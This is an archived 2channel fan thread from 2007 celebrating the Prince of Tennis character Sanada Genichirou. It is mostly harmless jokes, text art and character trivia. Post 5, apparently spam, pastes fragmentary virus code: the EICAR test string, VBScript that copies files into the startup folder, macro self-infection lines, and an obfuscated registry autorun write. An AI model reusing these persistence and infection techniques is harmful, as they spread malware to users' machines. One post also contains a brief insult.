2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【テニプリ】皇帝・真田弦一郎7【立海】

1 :名無しかわいいよ名無し:2007/10/22(月) 23:38:38 ID:qnF6rAys
真田弦一郎を愛でるスレです。

・sage進行でお願いします。


【俺の老け方も】皇帝・真田弦一郎【三倍速いわ!】
http://comic6.2ch.net/test/read.cgi/cchara/1088780112/

【テニプリ】皇帝・真田弦一郎2【おまえが微温いわ!】
http://comic6.2ch.net/test/read.cgi/cchara/1117816583/

【テニプリ】皇帝・真田弦一郎3【おまえがたわけだ!】
http://comic6.2ch.net/test/read.cgi/cchara/1145053152/

【テニプリ】皇帝・真田弦一郎4【おまえがたまらん!】
http://anime2.2ch.net/test/read.cgi/cchara/1160060458/

【テニプリ】皇帝・真田弦一郎5【おまえがたるんどる!】
http://anime2.2ch.net/test/read.cgi/cchara/1177483853/

【テニプリ】皇帝・真田弦一郎6【立海】
http://anime2.2ch.net/test/read.cgi/cchara/1189311043/


2 :名無しかわいいよ名無し:2007/10/22(月) 23:40:00 ID:qnF6rAys
真田弦一郎のPROFILE

・立海大附属中学校 3年
・誕生日:5月21日(牡牛座)
・身長:180cm
・体重:68kg
・血液型:A型
・利き腕:右
・プレイスタイル:オールラウンダー
・愛用メーカー:
  シューズ/YONEXパワークッション21(SHT-21)
  ラケット/BABOLAT VSドライブ
・得意技:風林火陰山雷
・好きな食べ物:なめこの味噌汁・肉
・趣味:筋肉トレーニング・将棋・書道
・家族構成:父・母・兄
・父親の職業(家業):公務員(祖父は警察で剣道教官)
・得意科目:歴史・体育(苦手科目なし)
・好きな色:黒・グレー
・好みのタイプ:そんなことを聞くとはたるんどる!(ご満悦気味)


3 :名無しかわいいよ名無し:2007/10/22(月) 23:41:03 ID:qnF6rAys
落ちてたので建てました。
もし需要なかったらゴメンナサイ

4 :名無しかわいいよ名無し:2007/10/23(火) 01:54:21 ID:Cd/bWEPG
乙!
需要あるよ、待ってた!

というわけで保守。

5 :名無しかわいいよ名無し:2007/10/23(火) 02:11:05 ID:C3H/B4DL
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :名無しかわいいよ名無し:2007/10/23(火) 20:04:09 ID:yclHFgyo
>>1
乙!

7 :名無しかわいいよ名無し:2007/10/24(水) 01:09:37 ID:piE+nx54
>>1
乙ランカー!

8 :名無しかわいいよ名無し:2007/10/24(水) 19:14:13 ID:ClufO+UT
乙!

9 :名無しかわいいよ名無し:2007/10/24(水) 21:46:59 ID:FUMwR9DS

ところで、真田顔文字ってどんなのだったか
誰か覚えてる人いませんか?

10 :名無しかわいいよ名無し:2007/10/24(水) 23:04:54 ID:iym7fsq5
顔文字は分からないや。ゴメソ
他の人に期待。

春に決勝戦のOVAが出るらしいね。
気が早いが真田の試合に期待。
OVAなのでテレビ版よりさらに格好良くなっているハズ

11 :名無しかわいいよ名無し:2007/10/25(木) 00:36:01 ID:I5v6bwwD
>1
乙!
春かー、楽しみだ

12 :名無しかわいいよ名無し:2007/10/25(木) 18:08:11 ID:HbMchG43

    ■■_ パーン
 ( ‘へ‘)
  ⊂彡☆))Д´)←>>9-10
忘れるなんてたるんどる!!

13 :名無しかわいいよ名無し:2007/10/26(金) 12:56:42 ID:70OXYfUn
復活していたのか真田スレ
とにかく乙!!
OVAも楽しみ。
2話ぶんぐらいかけてじっくり真田の試合が見たいが・・・無理だろうな

14 :名無しかわいいよ名無し:2007/10/26(金) 23:12:09 ID:tHDGgiY2
真田の回想が見たい。
回想でも多分あの声なんだろうけどwww

15 :名無しかわいいよ名無し:2007/10/27(土) 14:17:52 ID:GMkTovU7
ちいさいときからおっさん臭かったのかな(´・ω・`)

16 :名無しかわいいよ名無し:2007/10/27(土) 15:18:35 ID:4pCebM8V
そこがいいんじゃないか!
ともいいたいが、原作の回想だと(小学生や中一は)結構年相応で
かわいかったよ

17 :名無しかわいいよ名無し:2007/10/27(土) 20:46:02 ID:r4NGxBBj
あの真田が毎日なめこ汁を食べたがっていたらかわいい

18 :名無しかわいいよ名無し:2007/10/27(土) 21:33:57 ID:lfsWOTGV
あの宍戸みたいな帽子のかぶり方してた小さい真田は可愛かった。

19 :名無しかわいいよ名無し:2007/10/27(土) 22:34:07 ID:vj+byid0
真田は反応が可愛い。

20 :名無しかわいいよ名無し:2007/10/28(日) 03:20:08 ID:qo4cFu2T
回想に出てきた中2の真田は普通にかっこいいな
テニプリ世界の標準の2・3年生っぽい

しかし中1と中3とを比べるとまるで親子かとwww
あの世界は1〜2年生の間の成長がもの凄いけど、
真田の場合さらに2年〜3年生の老け方が異常ww

21 :名無しかわいいよ名無し:2007/10/28(日) 12:52:52 ID:YYRjbaik
よく熟考する人は顔が老ける(大人っぽい)らしい。
もしくは苦労人か

22 :名無しかわいいよ名無し:2007/10/28(日) 14:17:29 ID:IFlOwGhv
幸村が真田に苦労をかけすぎたせいで老けるのが早いとか。

23 :名無しかわいいよ名無し:2007/10/28(日) 20:07:58 ID:mQ9uoT5i
味噌汁って調理実習でやりそうだよな
具を何にするかで白熱して議論すればいいね

24 :名無しかわいいよ名無し:2007/10/28(日) 21:19:10 ID:5A2huEuc
>>23
エプロンに三角布姿の真田想像して吹いたw
似合わねぇwww

25 :名無しかわいいよ名無し:2007/10/28(日) 21:57:17 ID:5MZltbZB
でも生真面目な真田はキッチリ着けてそうだwww
エプロンはもちろん家庭科で作ったやつww

26 :名無しかわいいよ名無し:2007/10/28(日) 22:43:35 ID:0K2huNrK
三角布+かっぽうぎ姿を想像したww

27 :名無しかわいいよ名無し:2007/10/29(月) 01:25:47 ID:5K13LQTP
柳スレから無断コピペ
見たひと多いとおもうけど一応

850 :名無しかわいいよ名無し:2007/10/28(日) 21:05:36 ID:YOAtssN2
情報によると現状、スレ飽和状態になって8時間超のタイミングで圧縮が来るようだ。
スレ数が710辺りを越えたら、こまめに保守を心掛けたほうがいいかもな。

28 :名無しかわいいよ名無し:2007/10/29(月) 03:17:36 ID:CkNTuaZl
エプロンは家庭科で作ったくまさんのワッペン付き、
三角巾は結び方が下手で三角の部分がピーンと立ってダッサくなってるといい

29 :名無しかわいいよ名無し:2007/10/29(月) 03:48:42 ID:f3d2Pv8W
>>27
了解した。
いきなしレス増えて何事か?と思ったら
保守してたのね。みなさん乙。

30 :名無しかわいいよ名無し:2007/10/29(月) 09:46:49 ID:zGLm3hiS
>>28
ちょ…可愛いじゃねえかw

家庭科で慣れないミシンを一生懸命やってそうだな、皇帝


31 :名無しかわいいよ名無し:2007/10/29(月) 10:21:00 ID:QHopchDl
手縫いだと必ず1回は針で指刺してそう。

32 :名無しかわいいよ名無し:2007/10/29(月) 15:21:02 ID:RHk3MhV4
学校のミシンが古くて、下糸を入れるのに四苦八苦してればいい…!

33 :名無しかわいいよ名無し:2007/10/29(月) 15:34:00 ID:9O38x1cX
糸を針穴に通すときには
「入らんかー!」

34 :名無しかわいいよ名無し:2007/10/29(月) 16:20:59 ID:09Fy+pIT
>>32
私立だからな…どうだろうか

35 :名無しかわいいよ名無し:2007/10/29(月) 16:31:50 ID:7gKUFfVr
>>33
吹いたwww
針穴に糸が通らなくて苦労してる真田の横で幸村と柳(しかも柳は目を閉じて)
が楽々と糸を通している様子を何故か想像してしまったww

でも真田は意外に手先器用そうな感じがするな。
ちまちまと幸村の見舞い用に千羽鶴折ってたりとかしそう。
あと、びっくりするほど細かい城の模型を作ったりとか。

36 :名無しかわいいよ名無し:2007/10/29(月) 22:34:37 ID:+W7Ocj4m
樺路と一緒にボトルシップ

37 :名無しかわいいよ名無し:2007/10/30(火) 00:19:59 ID:Wdj7xJiW
米粒に自画像とか書いてくれ

38 :名無しかわいいよ名無し:2007/10/30(火) 12:16:41 ID:PLbSAVL0
極細の筆で習字なんてのもいい>米アート

39 :名無しかわいいよ名無し:2007/10/30(火) 23:32:17 ID:PLbSAVL0
寝る前に保守

40 :名無しかわいいよ名無し:2007/10/31(水) 01:37:40 ID:sfj5OB39
逆に、周りが器用だから負けじと自分もやってみるんだけど
うまくできなくてちゃぶ台ひっくり返して雄叫びの真田もいい

41 :名無しかわいいよ名無し:2007/10/31(水) 09:38:53 ID:kBx8qK2i
早口言葉が言えなくて必死になる真田は可愛かったなw

42 :名無しかわいいよ名無し:2007/10/31(水) 20:13:07 ID:Q8dbtiyJ
とりっく おあ とりーと

43 :名無しかわいいよ名無し:2007/10/31(水) 23:42:39 ID:Ur65VAeF
最近真田が可愛くて仕方がない。

44 :名無しかわいいよ名無し:2007/11/01(木) 06:41:20 ID:a5mlk/mM
>43
奇遇だな

45 :名無しかわいいよ名無し:2007/11/01(木) 15:20:16 ID:uO75EZWD
真田たまらんよ真田
早口言葉で噛むのも英語が何故かカタカナ風味なのも大好きだ。

46 :名無しかわいいよ名無し:2007/11/02(金) 02:53:26 ID:TupMj2UQ
ハイランカー!!!

47 :名無しかわいいよ名無し:2007/11/02(金) 16:46:03 ID:g63gxlI/


48 :名無しかわいいよ名無し:2007/11/03(土) 10:08:31 ID:QbqS/1rM
保守

49 :名無しかわいいよ名無し:2007/11/03(土) 10:22:39 ID:tAARG+RT
http://link-keeper.net/?Title=ok1

50 :名無しかわいいよ名無し:2007/11/03(土) 15:37:43 ID:BY8P0RWC
真田は燃え尽きたのかな

51 :名無しかわいいよ名無し:2007/11/03(土) 16:10:43 ID:gID2OBA5
? 何故そう思うんだ?
私の中ではいつでもテニヌとなめこ汁と肉への愛をたぎらせている
熱い男なんだが

52 :名無しかわいいよ名無し:2007/11/03(土) 16:23:49 ID:/+z7i/Eg
不死鳥は燃え尽きた灰の中から蘇るだろ?

また更に一段と強くなってしまった、ということだ

53 :名無しかわいいよ名無し:2007/11/03(土) 18:38:19 ID:XCTY9HSi
>52
「一段と強くなってしまった」を「一段と濃くなってしまった」と読み間違えた
クラスメイトにあんなのが居たら濃いよな…w

54 :名無しかわいいよ名無し:2007/11/03(土) 18:43:47 ID:GlQH5Nvb
クラスメイトにあんなのが居たら嬉しいに決まってるだろw

55 :名無しかわいいよ名無し:2007/11/03(土) 19:13:47 ID:GUrwOv8s
休みでも学校行きそう。

そういえばS3終了直後?だったか
真田に関係ありそうななさそうな企画が決まった
という話だったけど、発表はまだか。
今までずっと忘れてて唐突に、まだか、
と言うのもなんだが。

56 :名無しかわいいよ名無し:2007/11/04(日) 14:27:40 ID:TeM/S1UN
真田企画wktk

57 :名無しかわいいよ名無し:2007/11/04(日) 16:20:17 ID:OrC4K69r
       ,ィ                      __
      ,. / |´ ̄`ヽー- 、 ト、        , -‐、/./.- 、 書き込みのはやきこと風の如く
    / | |    ヽ   l l        ( 火◇風 ノ
  /o ̄`ハ._.ゝ===┴=く.ノ- 、      ノ ◇ ◇ (  他人と会話せざること林の如く
  /o O / l´ ⌒    ⌒  lo ',ヽ      ( 山◇ 林 }
  \___/. ト、( ●)  (●) ハ  ∧      `⌒/7へ‐´  ネットで煽ること火の如く
 / ,イ   レ::::⌒(__人__)⌒l~T--‐彡    /./      
/ ̄ ̄l. |、  |r┬-| ノ'l  l::::::::::彡ー7⌒つ、    部屋から動かざる事山の如し
彡:::::::::::l  ト、__ `ー' /|  l::::::::::::ミ  {,_.イニノ   
彡ソ/ノハ   ト、 \  / ,イ  川ハ ヾー‐'^┴


58 :名無しかわいいよ名無し:2007/11/04(日) 17:46:53 ID:tBwf6miA
あれは手塚のバレキスじゃないかと思った
何となく

59 :名無しかわいいよ名無し:2007/11/04(日) 19:17:12 ID:8IdZv/ua
で、バックコーラスに真田が入る...?

60 :名無しかわいいよ名無し:2007/11/05(月) 10:02:32 ID:hpakg/w9
手塚with真田のバレキスって…濃いにも程があるだろ常考



そりゃ見てみたいけどw
( ‘ヘ‘)皇帝・シャララ弦一郎のバレキスに勝る者は無し!!

61 :名無しかわいいよ名無し:2007/11/05(月) 22:16:58 ID:VpW/SjGI
濃ければ濃いほどいいんです

62 :名無しかわいいよ名無し:2007/11/06(火) 06:48:19 ID:yArXg1mr
>>60
しかも普通の「濃い」じゃなくて、混沌とした濃さがあるなww

63 :名無しかわいいよ名無し:2007/11/06(火) 10:37:25 ID:TiPLNXrU
そんなCDなら買おうという自分がいる

64 :名無しかわいいよ名無し:2007/11/06(火) 16:39:54 ID:ZTjlG0WW
ラジプリ仕様なら濃さとかいう話じゃないよな

65 :名無しかわいいよ名無し:2007/11/07(水) 02:09:27 ID:XMhgVfUJ
濃いとかいう次元じゃないなwww

66 :名無しかわいいよ名無し:2007/11/07(水) 08:34:44 ID:Gc+vdgUZ
創造と破壊の宇宙w

67 :名無しかわいいよ名無し:2007/11/07(水) 16:04:21 ID:n3I1e9Co
バレキスは3人でやるわけで、あともう1人声だけでいえば
榊監督を加えると濃いどころの話ではなくなるわけだが
ギャラが大変

68 :名無しかわいいよ名無し:2007/11/07(水) 16:30:52 ID:SYeVV3ry
眼鏡ーずだったらちょっと残念だな
「むっつりトリオ」とか「老けメン」とか新風巻き起こしてほしい

あ、いや真田大好きです

69 :名無しかわいいよ名無し:2007/11/07(水) 17:29:28 ID:8AEIlEpH
そもそもバックコーラスは同校の壁

70 :名無しかわいいよ名無し:2007/11/07(水) 20:09:09 ID:qYyVGLVK
つ大石バージョン

まぁあれはカラオケ流用だった訳だが

71 :名無しかわいいよ名無し:2007/11/07(水) 21:07:56 ID:4DWiqPto
>>68
それすごくいいなwww

72 :名無しかわいいよ名無し:2007/11/07(水) 21:26:33 ID:n3I1e9Co
手塚と真田は強くてかっこいいから
ギャグもやりやすいよね

>>69
それ言ったら終わり

73 :名無しかわいいよ名無し:2007/11/08(木) 00:55:14 ID:dT5JYzTY
もう手塚バレキスは真田と跡部でコーラスやったらいいw

豪華で最強な部長達の共演・・・これで売り上げ倍増だ!

74 :名無しかわいいよ名無し:2007/11/08(木) 01:07:08 ID:SmuQl0+C
>>73
跡部は出したから面白くないでしょ〜
やっぱ手塚真田榊が最高w

75 :名無しかわいいよ名無し:2007/11/08(木) 01:08:40 ID:SmuQl0+C
>>73
『2回も出したから』ね2回もが抜けてた

76 :名無しかわいいよ名無し:2007/11/08(木) 01:33:57 ID:VrSZbaE2
売れるなら3回でも4回でも出すさ
同校バックコーラス縛りなかったらマジで跡部じゃない

>>73
幸村部長はどうしたwww

77 :73:2007/11/08(木) 01:43:21 ID:dT5JYzTY
(゚Д゚)幸村部長・・・!?

他校との絡みが少ないから普通に忘れてたw
GIGSの越前抜きで勝手に妄想してた・・・本当にすみませんでした

78 :名無しかわいいよ名無し:2007/11/08(木) 08:11:17 ID:U67oThSf
まぁ、他の学校だったら普通に部長でおかしくないもんな

まるで南あたりから部長分を吸い取ったかのように…

79 :名無しかわいいよ名無し:2007/11/08(木) 08:45:40 ID:OYQVUx7p
南は地味かもしれないが部長としてはちゃんとしているじゃないか
ここは部の代表にふさわしい「派手さ」を南から吸い取ってしまったという事に・・・

80 :名無しかわいいよ名無し:2007/11/08(木) 15:18:52 ID:QkjNN+n8
なんかのマンガのOVAで30代くらいの主役がいててんけど
それが真田にそっくりやって...
すまんな、脳内変換で見てもうて



しまいに噴いたw

81 :名無しかわいいよ名無し:2007/11/08(木) 15:35:19 ID:0372KXhZ
むしろ幸村with真田・手塚

ヒエラルキーの頂点

82 :名無しかわいいよ名無し:2007/11/08(木) 15:53:21 ID:b180aYV9
幸村が頂点なのはわかるが真田のことだったら同意しかねるw
総平手打ちとかされてたしなあ

83 :名無しかわいいよ名無し:2007/11/08(木) 16:20:05 ID:pbC1fU6Z
>>55以降続いてる話題は前スレにあったやつだよな?
結局ソースは何?自分は見つけらんなかったのだが

84 :名無しかわいいよ名無し:2007/11/08(木) 19:09:37 ID:3pSF88ci
もう消されたのかな?
真田が勝利の雄たけびをあげたあたりの頃に
アトラクションサイトのメッセージのところに書いてあった


85 :名無しかわいいよ名無し:2007/11/08(木) 19:11:20 ID:3pSF88ci
すまんあげてしまったorz

86 :名無しかわいいよ名無し:2007/11/08(木) 20:30:31 ID:FsZniFV7
>>82
おそらく自分で決めたルールを、副部長のメンツにかけて自分も守らなくては!
とか思ったんじゃないかな?性格的に。

何だかんだ言ってヒエラルキーは割と高い気がする。

87 :名無しかわいいよ名無し:2007/11/08(木) 21:36:21 ID:e3f9KF9J
ヒエラルキーって……………………ま、いいか


>>83
真田勝ったのかー
今日企画が決まった訳だが
これは何かの暗示なのか?

ウロだがこんなんだったよ、確か

88 :名無しかわいいよ名無し:2007/11/09(金) 01:29:54 ID:lfU/PoVs
ヒエラルキーって真田が幸村や手塚の下みたいに言われてもな
なんでそうなるんだが
部長と副部長の役割は違えど

89 :貧質:2007/11/09(金) 08:55:31 ID:5z7iKbaQ
真田カコイイ(・∀・)!!

90 :名無しかわいいよ名無し:2007/11/09(金) 16:49:52 ID:6gyS1Ux3
強さの頂点上から3人―程度の意味だったんだが
いろいろ誤解させたようでごめんよ

91 :名無しかわいいよ名無し:2007/11/09(金) 16:52:59 ID:6gyS1Ux3
>>90>>81です

92 :名無しかわいいよ名無し:2007/11/09(金) 18:17:46 ID:ttwZz5s9
それより>>89の名前欄が異常に気になる

93 :名無しかわいいよ名無し:2007/11/09(金) 19:54:08 ID:lfoKprrb
>>90
自分はそーいう意味とばかり思ってたんだぜ

>>84,87
手塚バレキスの謎が解けたぜd

94 :名無しかわいいよ名無し:2007/11/09(金) 23:39:13 ID:xIZfI73V
>>90
>>87だけど
やっぱ、それでいいんだよな
どうも流れが不明でw



そもそもの疑問にもどると
肝心の>>55は謎のままか

95 :名無しかわいいよ名無し:2007/11/10(土) 00:40:05 ID:e6pfgdMX
切れ長二重の目
通った高い鼻筋
シャープな輪郭
高い身長と程よいたくましい体

なぜコレでおっさんネタキャラ扱いなんだぜ?
普通にいい男だぜ?

96 :名無しかわいいよ名無し:2007/11/10(土) 00:49:46 ID:i7HA67j7
そりゃ言動がおかしいからだろうw

でも自分も真田はマジでかっこいいと思ってる
それでいて可愛くもあるし最強だぜ弦ちゃん

97 :名無しかわいいよ名無し:2007/11/10(土) 01:24:42 ID:JaEDxgT9
>>95
普通にいい男としか思ってないのですが・・・

98 :名無しかわいいよ名無し:2007/11/10(土) 05:50:14 ID:KYvdb1Fe
そんな真田は自分より手塚の方が老けてると思ってるんだよねww

今さらだけど真田の前髪の横ぱっつんはたまらんな!
ホントなんなんだよあのカット・・・魅力的すぎるわw

99 :名無しかわいいよ名無し:2007/11/10(土) 06:07:15 ID:8dXOVdsZ
×普通にいい男
○超いい男

100 :名無しかわいいよ名無し:2007/11/10(土) 06:59:57 ID:umINRnFS
それでは普通に超イイ男という事で100ゲト

101 :名無しかわいいよ名無し:2007/11/10(土) 12:43:15 ID:NecIFAhm
あの言動で全てのカコイイところとプラマイゼロになるんだろなぁ…
でもそれが魅力www

102 :名無しかわいいよ名無し:2007/11/10(土) 13:11:16 ID:7KHOEsjE
金太郎風に超ウルトラグレートデリシャスいい男でおk?
ちなみに俺は2次元でも3次元でも真田以上にカコイイ男はいないと思ってるよ。

病気かな・・・orz

103 :名無しかわいいよ名無し:2007/11/10(土) 16:33:07 ID:7cxnNMSu
>>102
あえてツッコミ入れてみる
それは「恋の病」であると…






自分で書いてて恥ずかしくなったw
これじゃまるでボケではないか、どうしてくれるこのたわけが!(真田風に)
…はい失礼しました

104 :名無しかわいいよ名無し:2007/11/10(土) 20:49:48 ID:34c1zEQZ
イケメンとかいう言葉とかは似合わないけど、男前で好きだな。真田

105 :名無しかわいいよ名無し:2007/11/10(土) 21:33:25 ID:6eUa5YzI
S♥A♥N♥A♥D♥A WOW!

106 :名無しかわいいよ名無し:2007/11/11(日) 02:11:34 ID:tmiIazc3
後輩だったら弦ちゃん先輩って呼んでみたいね

107 :名無しかわいいよ名無し:2007/11/11(日) 11:34:50 ID:YfbI6bzD
真田が後輩だったら弦一郎って呼べなくて真田くんになりそうだ

108 :名無しかわいいよ名無し:2007/11/11(日) 21:19:40 ID:kjW0juC/
俺も下の名前でなんて絶対呼べないww
年上の人と同じように真田さんだろうな。壇くんとかは普通にくん付けだろうが。



109 :名無しかわいいよ名無し:2007/11/11(日) 22:05:02 ID:4uUyKe9N
いつぞやの回想シーンに出てきた可愛い状態なら「弦ちゃん」くらいなら呼べるかも?w
今は凛々しくて恐れ多いからなぁ・・・「真田」とかかな?
ああ柳になりたい・・・w

110 ::2007/11/11(日) 22:33:08 ID:tbTVHngt
自分なんかは学生時代には真田の魅力はあんまり分からないだろーなー

飛躍して。リーマンならありかもしれん
会社にあんな同僚or先輩or上司いたらいいのにね!
仁王みたいな上司はいたけどさ。憧れだったけどさ(笑)

111 :名無しかわいいよ名無し:2007/11/12(月) 12:15:34 ID:gc2B5KWJ
俺は最終的に先輩だろうが後輩だろうが
弦一郎さんって呼べるようになりたいんだぜ

112 :名無しかわいいよ名無し:2007/11/13(火) 00:36:35 ID:xn+SpIwV
なんでかわからないけど、真田は真田って呼びたい

113 :名無しかわいいよ名無し:2007/11/13(火) 11:29:49 ID:cVtkiXuk
はぁ・・・とうとうバイト辞めて来ちゃったぜ・・・
真田にたるんどる!って言われるかな・・・

114 :名無しかわいいよ名無し:2007/11/13(火) 11:43:52 ID:h5OpHmNP
妄想とチラ裏が多すぎる
ウザイ

115 :名無しかわいいよ名無し:2007/11/13(火) 12:06:08 ID:8M+x/3SC
言われたら萌えるよ・・・

116 :名無しかわいいよ名無し:2007/11/13(火) 12:24:34 ID:qHXT9nfj
サナダムシって呼びたい

117 :名無しかわいいよ名無し:2007/11/13(火) 15:18:33 ID:ZhgPjbQT
>>116
死ね

118 :名無しかわいいよ名無し:2007/11/13(火) 17:57:37 ID:Gno27MMh
>>113

    ■■_ パーン
 ( ‘へ‘)
  ⊂彡☆))Д´)←>>113
たるんどる!!


119 :名無しかわいいよ名無し:2007/11/13(火) 18:40:01 ID:BRUqpDTY
>>114
とりあえずなめこの味噌汁でも食べろ つ旦~
弦ちゃん手作りだってさ

前スレが落ちて復活したばかりなんだからさ。
あんまり酷いときは仕方ないだろうけど、今はまったり見守っていこうぜ。
ここはキャラに萌えるスレだしな。

120 :名無しかわいいよ名無し:2007/11/13(火) 18:49:25 ID:Db4GhSUq
そんなことより、そのなめこの味噌汁をこっちにもくれ。

121 :名無しかわいいよ名無し:2007/11/13(火) 18:59:49 ID:gWQL/KuZ
こっちにも。

122 :名無しかわいいよ名無し:2007/11/13(火) 19:50:06 ID:3yDbP4u2
こっちにも

123 :名無しかわいいよ名無し:2007/11/13(火) 22:01:29 ID:qHXT9nfj
殴られた顔がいたい
こっちにもNAMEKOミソスープ

124 :名無しかわいいよ名無し:2007/11/13(火) 22:54:48 ID:tIq9KvWx
料理じょうずなんだろうなー

125 :名無しかわいいよ名無し:2007/11/14(水) 00:19:10 ID:a0KhPu0j
>>124
自分は、なめこの味噌汁だけ料亭並に上手くて、他の料理は壊滅的だと萌えるw

126 :名無しかわいいよ名無し:2007/11/14(水) 08:29:06 ID:FGBTYkKl
 
    ■■_
 ( ‘へ‘)つ∪∪∪∪
>>120-123熱いから気をつけろ。


127 :名無しかわいいよ名無し:2007/11/14(水) 20:10:51 ID:OFOodCS7
>>126
このなめこは……
氷帝の日吉か。さすが真田君、素材選びも抜かりない。

128 :名無しかわいいよ名無し:2007/11/14(水) 21:25:29 ID:ONP9PdHp
氷帝の日吉…?あぁ踊るテニスのあいつだな。
ありがたく頂戴する。

129 :名無しかわいいよ名無し:2007/11/14(水) 22:44:41 ID:owN+HweI
>>126
lol

130 :名無しかわいいよ名無し:2007/11/15(木) 17:14:50 ID:TWbtZ1O6
  むっ、しまった!     
   ̄ ̄ ̄ ̄∨ ̄ ̄ ̄
    _■■■      ("
:.。.コ ⊂(`Д´;⊂⌒`つ(⌒;
     ̄ ̄ (^(⌒;
     ズザーーーーーッ

>>131-135へのなめこの味噌汁

131 :名無しかわいいよ名無し:2007/11/15(木) 19:51:36 ID:m6DzXt3W
>>130
可愛いw
くそ真面目でしっかりしてるのに時々抜けてる真田萌え

132 :名無しかわいいよ名無し:2007/11/15(木) 19:59:36 ID:1t3TzYDn
>135までに入ってみそしるいただいたいく

133 :120:2007/11/15(木) 23:11:49 ID:N+QdyvPX
⊂(゚Д゚⊂⌒`つ≡≡≡ズサー
よし。間に合ったな。
>>126,130
ちょうどこれから晩飯。いただきます。

134 :名無しかわいいよ名無し:2007/11/16(金) 07:48:26 ID:Gm80OEfv
味噌汁げっとー!!

135 :名無しかわいいよ名無し:2007/11/16(金) 09:09:00 ID:QlrFGSkA
>>124 公式情報じゃないけどゲームでは
おばあちゃんの手伝いで作ったりはできるが上手くはないと言ってたようなw
でも自分に厳しい真田の事だからそうは言っても上手そうだね。

136 :名無しかわいいよ名無し:2007/11/16(金) 09:28:54 ID:xe3m4QYD
おばあちゃんの手伝いwかわいい孫だな。

そういえばラジオの夏休み日記でも「おばあちゃんの作るなめこ汁は本当に美味しい」って言ってたっけ。


137 :名無しかわいいよ名無し:2007/11/16(金) 12:00:02 ID:+13eNZZw
夏休み日記は柳生にキレてたお年頃真田の印象が強すぎてw
あの月のCDだけ持ってるから聞いてくるわノシ

138 :名無しかわいいよ名無し:2007/11/16(金) 14:29:50 ID:H6YLjMhz
柳生にキレてたってそれいつのラジオ?!
めっちゃ聞きたいんで教えてください

139 :名無しかわいいよ名無し:2007/11/16(金) 15:06:55 ID:uQFYO8m9
ログ読めよ新規
教えてちゃんうざい

140 :名無しかわいいよ名無し:2007/11/16(金) 19:16:19 ID:IsVxskKw
>>137
あれは萌える。

>>138
自分はそこだけ人に聞かせてもらったんで知らんというか分からない。
ちなみに、この話題前に一度出たけど放送時期の話は
確か出なかったと思うんでログ読んでも分からないと思う。たぶん。

141 :名無しかわいいよ名無し:2007/11/16(金) 20:32:23 ID:F9bf+a9H
>>138
ラジプリ第73回
2004年8月3週目

142 :名無しかわいいよ名無し:2007/11/16(金) 20:34:07 ID:F9bf+a9H
ってなんでageになる?
専ブラ調子悪い

143 :名無しかわいいよ名無し:2007/11/16(金) 20:57:21 ID:m+AnsIJj
夏の話題だったねそういえば
内容も言い草も萌えたなー

144 :名無しかわいいよ名無し:2007/11/16(金) 23:02:44 ID:H6YLjMhz
>>138です。
ログ読んだつもりだったんですが空気悪くして
すみませんでした。
あと教えていただいてありがとうございます!
頑張って探して聞いてみます!

では半年ROMらせてもらいます...

145 :名無しかわいいよ名無し:2007/11/16(金) 23:28:35 ID:aNMrpSac
半年ROMる必要はないので
どうやってログ読んだか教えておくんなまし
久しぶりに初代スレ読みたい

146 :名無しかわいいよ名無し:2007/11/17(土) 03:22:19 ID:b/10jENw
半年ロムは必要だろこのレベルじゃw

>>145
●買えば?
それかアカイブ

147 :名無しかわいいよ名無し:2007/11/17(土) 03:33:27 ID:qWnU739w
>145も半年ロムれって感じだけどな
上から目線でチャンとかどんだけー

148 :名無しかわいいよ名無し:2007/11/17(土) 04:02:36 ID:NIBbulT5
まあキャラスレでそんなこと言ってたら人いなくなるしね
味噌汁片手に萌えればいいんじゃない

149 :名無しかわいいよ名無し:2007/11/17(土) 04:25:01 ID:xrb7h7ap
唐突だけど…
真田も普通に体育の授業受けてると思ったら違和感凄いね。
体操服着て半ズボンにインして、前にならえとかしてるんだよねw

150 :名無しかわいいよ名無し:2007/11/17(土) 04:47:54 ID:LBg4uW9t
うちの中学男子長ジャーだったんでその発想はなかった
体育の授業とか萌えるわ

151 :名無しかわいいよ名無し:2007/11/17(土) 05:30:30 ID:NIBbulT5
てか違和感強いほど萌えるのは何なんだろうw

152 :名無しかわいいよ名無し:2007/11/17(土) 11:03:40 ID:I+poTdSF
体育か…ドッジボールとかやるよね。
真田が相手チームにいたら怖いだろうなw逆に味方だったら凄い頼もしい。

153 :名無しかわいいよ名無し:2007/11/17(土) 12:08:57 ID:PzsgmAhB
「フハハハハーッ!!微温い微温い微温いわーっ!!」
こんなん相手チームにいたらトラウマになるwww

154 :名無しかわいいよ名無し:2007/11/17(土) 12:28:39 ID:g/oVwhBp
味方にいたら頼もしいことこの上ないな

155 :名無しかわいいよ名無し:2007/11/17(土) 12:35:40 ID:d6snmNmv
風→凄い速球
林→凄い変化球
火→凄い豪球
山→どんな球でもキャッチ&セーフ

こんなんが1人でもいる時点で相手チームは負け確実だな

156 :名無しかわいいよ名無し:2007/11/17(土) 12:45:15 ID:URNxoNii
真田が中学生らしいことをしているだけでもう萌える

157 :名無しかわいいよ名無し:2007/11/17(土) 13:16:58 ID:R4hBUiZt
しかしあの身長だ。
成長痛に悩まされただろうな。
柳スレによれば、骨がミシミシいったりする場合もあるらしいし。
…考えるだけでも痛いな… orz


(;−_−)<しばらく体育と部活はドクターストップだそうだ

 ■■_
(;`Д´)<くッ…致し方あるまい…

